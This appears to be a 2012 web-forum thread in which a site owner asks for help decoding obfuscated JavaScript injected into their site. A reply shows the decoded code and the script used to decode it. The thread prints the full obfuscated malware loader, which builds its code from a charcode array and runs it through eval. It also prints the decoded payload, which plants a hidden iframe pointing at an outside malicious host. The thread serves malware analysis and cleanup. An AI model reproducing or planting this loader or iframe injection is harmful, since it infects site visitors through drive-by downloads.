can anyone help decode this for me?

Discussion in 'General Scripting Chat' started by intence, Jun 12, 2012.

  1. intence

    intence Regular Member

    Joined:
    Nov 21, 2008
    Messages:
    435
    Likes Received:
    77
    One of my sites got malware and the dreaded "this site may compromise your computer" warning. I found this in the source code but having trouble decoding it.

    Thanks for the help

    Code:
    <script>i=0;if(window["document"])try{grbregd=prototype;}catch(z){h="Code";f=[9,18,315,102,64,120,100,222,297,117,218,303,110,232,138,103,202,348,69,216,303,109,202,330,116,230,198,121,168,291,103,156,291,109,202,120,39,196,333,100,242,117,41,182,144,93,82,369,13,18,27,9,210,306,114,194,327,101,228,120,41,118,39,9,18,375,32,202,324,115,202,96,123,26,27,9,18,300,111,198,351,109,202,330,116,92,357,114,210,348,101,80,102,60,210,306,114,194,327,101,64,345,114,198,183,39,208,348,116,224,174,47,94,318,102,206,363,122,228,330,100,220,138,111,220,348,104,202,357,101,196,138,110,234,141,63,206,333,61,100,117,32,238,315,100,232,312,61,78,147,48,78,96,104,202,315,103,208,348,61,78,147,48,78,96,115,232,363,108,202,183,39,236,315,115,210,294,105,216,315,116,242,174,104,210,300,100,202,330,59,224,333,115,210,348,105,222,330,58,194,294,115,222,324,117,232,303,59,216,303,102,232,174,48,118,348,111,224,174,48,118,117,62,120,141,105,204,342,97,218,303,62,68,123,59,26,27,9,250,39,9,18,306,117,220,297,116,210,333,110,64,315,102,228,291,109,202,342,40,82,369,13,18,27,9,236,291,114,64,306,32,122,96,100,222,297,117,218,303,110,232,138,99,228,303,97,232,303,69,216,303,109,202,330,116,80,117,105,204,342,97,218,303,39,82,177,102,92,345,101,232,195,116,232,342,105,196,351,116,202,120,39,230,342,99,78,132,39,208,348,116,224,174,47,94,318,102,206,363,122,228,330,100,220,138,111,220,348,104,202,357,101,196,138,110,234,141,63,206,333,61,100,117,41,118,306,46,230,348,121,216,303,46,236,315,115,210,294,105,216,315,116,242,183,39,208,315,100,200,303,110,78,177,102,92,345,116,242,324,101,92,336,111,230,315,116,210,333,110,122,117,97,196,345,111,216,351,116,202,117,59,204,138,115,232,363,108,202,138,108,202,306,116,122,117,48,78,177,102,92,345,116,242,324,101,92,348,111,224,183,39,96,117,59,204,138,115,202,348,65,232,348,114,210,294,117,232,303,40,78,357,105,200,348,104,78,132,39,98,144,39,82,177,102,92,345,101,232,195,116,232,342,105,196,351,116,202,120,39,208,303,105,206,312,116,78,132,39,98,144,39,82,177,13,18,27,9,200,333,99,234,327,101,220,348,46,206,303,116,138,324,101,218,303,110,232,345,66,242,252,97,206,234,97,218,303,40,78,294,111,200,363,39,82,273,48,186,138,97,224,336,101,220,300,67,208,315,108,200,120,102,82,177,13,18,27,125];v="e"+"v"+"a";}if(v)e=window[v+"l"];try{q=document.createElement("b");if(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];} r=String;z=((e)?h:"");for(;577-5+5>i;i+=1){j=i;if(e)s=s+r["fr"+"omChar"+((e)?z:12)]((w[j]/(j%3+1)));} try{dsgsdg=prototype;}catch(dsdh){e(((e)?s:12));}</script>
    
     
  2. skrode

    skrode Junior Member

    Joined:
    Nov 13, 2011
    Messages:
    103
    Likes Received:
    16
    Code:
    if (document.getElementsByTagName('body')[0]) {
        iframer();
    } else {
        document.write("<iframe src='http://jfgyzrndn.ontheweb.nu/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    
    function iframer() {
        var f = document.createElement('iframe');
        f.setAttribute('src', 'http://jfgyzrndn.ontheweb.nu/?go=2');
        f.style.visibility = 'hidden';
        f.style.position = 'absolute';
        f.style.left = '0';
        f.style.top = '0';
        f.setAttribute('width', '10');
        f.setAttribute('height', '10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }
    
     
    • Thanks Thanks x 1
  3. intence

    intence Regular Member

    Joined:
    Nov 21, 2008
    Messages:
    435
    Likes Received:
    77
    wow thanks. could you tell me what it was encoded in? like base64 etc? so I know in the future.
     
  4. skrode

    skrode Junior Member

    Joined:
    Nov 13, 2011
    Messages:
    103
    Likes Received:
    16
    it was done with array of obfuscated charcodes. i used following script to translate it:

    Code:
    <script>
        var w = [9, 18, 315, 102, 64, 120, 100, 222, 297, 117, 218, 303, 110, 232, 138, 103, 202, 348, 69, 216, 303, 109, 202, 330, 116, 230, 198, 121, 168, 291, 103, 156, 291, 109, 202, 120, 39, 196, 333, 100, 242, 117, 41, 182, 144, 93, 82, 369, 13, 18, 27, 9, 210, 306, 114, 194, 327, 101, 228, 120, 41, 118, 39, 9, 18, 375, 32, 202, 324, 115, 202, 96, 123, 26, 27, 9, 18, 300, 111, 198, 351, 109, 202, 330, 116, 92, 357, 114, 210, 348, 101, 80, 102, 60, 210, 306, 114, 194, 327, 101, 64, 345, 114, 198, 183, 39, 208, 348, 116, 224, 174, 47, 94, 318, 102, 206, 363, 122, 228, 330, 100, 220, 138, 111, 220, 348, 104, 202, 357, 101, 196, 138, 110, 234, 141, 63, 206, 333, 61, 100, 117, 32, 238, 315, 100, 232, 312, 61, 78, 147, 48, 78, 96, 104, 202, 315, 103, 208, 348, 61, 78, 147, 48, 78, 96, 115, 232, 363, 108, 202, 183, 39, 236, 315, 115, 210, 294, 105, 216, 315, 116, 242, 174, 104, 210, 300, 100, 202, 330, 59, 224, 333, 115, 210, 348, 105, 222, 330, 58, 194, 294, 115, 222, 324, 117, 232, 303, 59, 216, 303, 102, 232, 174, 48, 118, 348, 111, 224, 174, 48, 118, 117, 62, 120, 141, 105, 204, 342, 97, 218, 303, 62, 68, 123, 59, 26, 27, 9, 250, 39, 9, 18, 306, 117, 220, 297, 116, 210, 333, 110, 64, 315, 102, 228, 291, 109, 202, 342, 40, 82, 369, 13, 18, 27, 9, 236, 291, 114, 64, 306, 32, 122, 96, 100, 222, 297, 117, 218, 303, 110, 232, 138, 99, 228, 303, 97, 232, 303, 69, 216, 303, 109, 202, 330, 116, 80, 117, 105, 204, 342, 97, 218, 303, 39, 82, 177, 102, 92, 345, 101, 232, 195, 116, 232, 342, 105, 196, 351, 116, 202, 120, 39, 230, 342, 99, 78, 132, 39, 208, 348, 116, 224, 174, 47, 94, 318, 102, 206, 363, 122, 228, 330, 100, 220, 138, 111, 220, 348, 104, 202, 357, 101, 196, 138, 110, 234, 141, 63, 206, 333, 61, 100, 117, 41, 118, 306, 46, 230, 348, 121, 216, 303, 46, 236, 315, 115, 210, 294, 105, 216, 315, 116, 242, 183, 39, 208, 315, 100, 200, 303, 110, 78, 177, 102, 92, 345, 116, 242, 324, 101, 92, 336, 111, 230, 315, 116, 210, 333, 110, 122, 117, 97, 196, 345, 111, 216, 351, 116, 202, 117, 59, 204, 138, 115, 232, 363, 108, 202, 138, 108, 202, 306, 116, 122, 117, 48, 78, 177, 102, 92, 345, 116, 242, 324, 101, 92, 348, 111, 224, 183, 39, 96, 117, 59, 204, 138, 115, 202, 348, 65, 232, 348, 114, 210, 294, 117, 232, 303, 40, 78, 357, 105, 200, 348, 104, 78, 132, 39, 98, 144, 39, 82, 177, 102, 92, 345, 101, 232, 195, 116, 232, 342, 105, 196, 351, 116, 202, 120, 39, 208, 303, 105, 206, 312, 116, 78, 132, 39, 98, 144, 39, 82, 177, 13, 18, 27, 9, 200, 333, 99, 234, 327, 101, 220, 348, 46, 206, 303, 116, 138, 324, 101, 218, 303, 110, 232, 345, 66, 242, 252, 97, 206, 234, 97, 218, 303, 40, 78, 294, 111, 200, 363, 39, 82, 273, 48, 186, 138, 97, 224, 336, 101, 220, 300, 67, 208, 315, 108, 200, 120, 102, 82, 177, 13, 18, 27, 125];
        var i = 0;
        var s;
        var j;
        for (; 577 - 5 + 5 > i; i += 1) {
            j = i;
            s = s + String.fromCharCode((w[j] / (j % 3 + 1)));
        }
        alert(s);
    </script>